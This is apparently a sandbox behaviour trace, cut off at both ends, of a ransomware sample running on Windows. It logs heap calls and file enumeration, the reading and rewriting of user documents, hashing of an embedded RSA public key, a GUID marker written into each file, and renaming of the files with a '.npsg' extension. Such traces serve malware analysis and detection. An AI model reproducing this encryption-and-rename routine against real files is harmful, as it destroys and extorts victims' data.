hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400680 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400668 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.536] GetCurrentThreadId () returned 0x5b4 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b824c8 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.536] GetCurrentThreadId () returned 0x5b4 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400668 [0237.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400680 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006e0 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006f8 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400698 [0237.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400668 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409290 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.541] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x2a8f, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x2a8f, lpOverlapped=0x0) returned 1 [0237.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.541] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2a94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.542] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.542] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.542] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.542] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.542] CloseHandle (hObject=0x644) returned 1 [0237.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0237.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.544] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\n5R3r3ah.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\n5r3r3ah.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\n5R3r3ah.xls.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\n5r3r3ah.xls.npsg")) returned 1 [0237.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.545] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.546] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd040330, ftCreationTime.dwHighDateTime=0x1d5b969, ftLastAccessTime.dwLowDateTime=0x7450b0d0, ftLastAccessTime.dwHighDateTime=0x1d5bba9, ftLastWriteTime.dwLowDateTime=0x7450b0d0, ftLastWriteTime.dwHighDateTime=0x1d5bba9, nFileSizeHigh=0x0, nFileSizeLow=0x436b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qrfDtUiJ12.pptx", cAlternateFileName="QRFDTU~1.PPT")) returned 1 [0237.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.546] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qrfDtUiJ12.pptx") returned=".pptx" [0237.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qrfDtUiJ12.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\qrfdtuij12.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.547] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=17259) returned 1 [0237.547] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.562] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x4345, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.562] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.563] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.563] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x436b, lpOverlapped=0x0) returned 1 [0237.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.564] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.564] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.565] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.565] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.565] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.566] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.566] GetLastError () returned 0x0 [0237.566] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.566] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.566] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.566] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.566] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4370) returned 0x3b83cd0 [0237.566] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409290 [0237.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.566] RtlAllocateHeap 